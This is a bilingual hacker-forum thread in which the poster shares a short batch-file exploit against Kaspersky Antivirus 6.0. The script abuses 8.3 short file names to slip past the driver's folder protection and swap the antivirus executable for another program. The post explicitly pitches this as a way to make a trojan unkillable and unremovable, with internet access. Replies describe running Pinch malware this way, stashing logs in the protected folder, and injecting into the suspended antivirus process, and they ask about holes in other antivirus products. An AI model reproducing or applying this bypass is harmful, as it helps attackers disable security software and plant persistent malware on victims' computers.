Автозагрузка by Каспер (Startup by Kasper) How to kick Kasper out, set a program for startup and make it unremovable Sound's like something very useful, simultaneously trivial easily. Ones I’ve installed a Kasper(Kaspersky Antivirus) for experiments, began experimenting with API hooks and found out, that Kasper hook them in the ring0, then I stopped experiments with ring0 and began experiments with something else(doesn’t metter what), but Kasper was continue annoying me by its annoying alerts, so I open task-manager and “Delete”, but it shows my “Access denied”. And I got an idea that if I’d name my program “avp.exe”, it’d become unkillable, it didn’t work. Then I decided to rename Kasper and put my program instead, but it again screaming “denied”, I couldn’t even just copy my file into its folder. So I did it a little different, code snip bellow. After reboot, notepad sowed up instead of Kasper but its folder was still protected, and user’s methods couldn’t delete/rename it. It’s possible by the end of your dirty job run Kasper and it’ll work like nothing happened, you can even build your own loader, that will execute Kasper suspended, inject into it, and then lat it protect itself with your code inside, It’d by not only unkillable, but unremovable and had access to the Internet The vulnerability is, because filter file-system access in ring0 by long names to its folded, but doesn’t give a shit about FORMAT 8.3, that every windows system support When they close the hole, I’ll give another method, (2 lines longer ) if it’d still be working. Sorry, English version was a little late, but not they said that not so many people using it, so I think that English version would help a little Good luck with trojanization… Как снести каспера, добавив свою прогу в автозагрузку, при этом сделав её не удаляемой Звучит очень полезно, приэтом тривиально просто. Поставил я себе каспера(для экспериментов ) ну и начал экспериментировать с перехватом АПИ, оказалось он их в нулевом кольце перехватывает, тогда я отложил эксперименты с нулевым кольцом и начал экспериментировать с кое-чем другим(не важно с чем), но каспер продолжал мешать, своими назойливыми окнами, ну я зашел в список процессов и делет, а он мне Эксес Денайд, я подумал почему бы не переименовать свою прогу в avp.exe, может она тоже станет не убиваемая. Не прокатило. Тогда я решил переименовать каспера и записать её на его место, а он мне опять кричит Эксес Денайд. Даже просто файл скопировать в свою папку не дал. Тогда я сделал так: Code: rem Sploit by hidden for kasper 6.0 set kasper=%ProgramFiles%\KASPER~1\KASPER~1.0 move "%kasper%\avp.exe" "%kasper%\avpx.exe" copy "%windir%\system32\notepad.exe" "%kasper%\avp.exe" При загрузке, вместо каспера стал появляться блокнот, при этом сама папка, в которой он лежит, осталась защищённая, и его из неё юзерскими методами не удалить. Можно также из своей программы по окончанию своих грязных дел запустить каспера и он заработает в своём нормальном режиме, а при большом желании можно ещё и лоадер сделать, который бы его запускал остановленым, инжектился внутрь, ресюмил бы его тред. Тогда бы он был бы не только не удалаемым, но и не убиваемым, причём с разрешением доступа в интернет так что жерзайте, пока они дырачку не прикрыли Косяк весь в том, что его драйвер сидя у себя в нулевом кольце и фильтруя АПИ, на совпадение с именем своей директории, считает себя богом винды и даже не утруждает себя проверять пути в формате 8.3 Когда закроют дырачку, поделюсь другим способом(длинее на 2 строки ), если он всё ещё будет работать. Удачной троянизации...
Это же надо, прошло 3 месяца, а баг всё-ещё не по фиксили, M$ и то оперативнее реагируют Если сплоит перестанет работать, плиз сообщите, чтоб я следующий выложил, просто не хочется ставить себе такую махину, чтоб узнать что они всё-ещё ничего не решили ЗЫ Неужели они не читают наш форум
Круто, я так пинча теперь запускаю. Я слышал что в кьюк фаерволе есть дырка в файле feedback.exe через нее вирус на комп проползает. И скрывается от сканирования антивирусами. Как использовать эту багу я не знаю
Процесс то удаляется, зато сама папка и этот файл защищены, там-же и логи хранить можно, чтоб не удаляли
Каспер включает защиту когда загружается, как вариант, запустить его остановленным, проинжектится внутрь, а потом разрешить ему включить защиту)) Но я не проверял этот вариант.
Дырочку закрыли в КИС 8. При запуске батника пишет: "В доступе отказано". Хотелось бы услышать о втором способе. И еще интересуют НОД с Доктором Вебом - есть ли в них дырки какие-нибудь?
Ну не прокатывает батник с 8-кой. Пофиксили эту багу с 8.3-путями. Вот и хочется узнать о втором способе.
Зачем обманываешь?, батник работает как часы, во всяком случае на том каспере, что по ссылке выше Это самый удобный способ, я не буду палить другой, пока не подтвердится, что этот не работает. ХЕК Техническая сложность хттп://forum.kaspersky.com/index.php?showtopic=50136
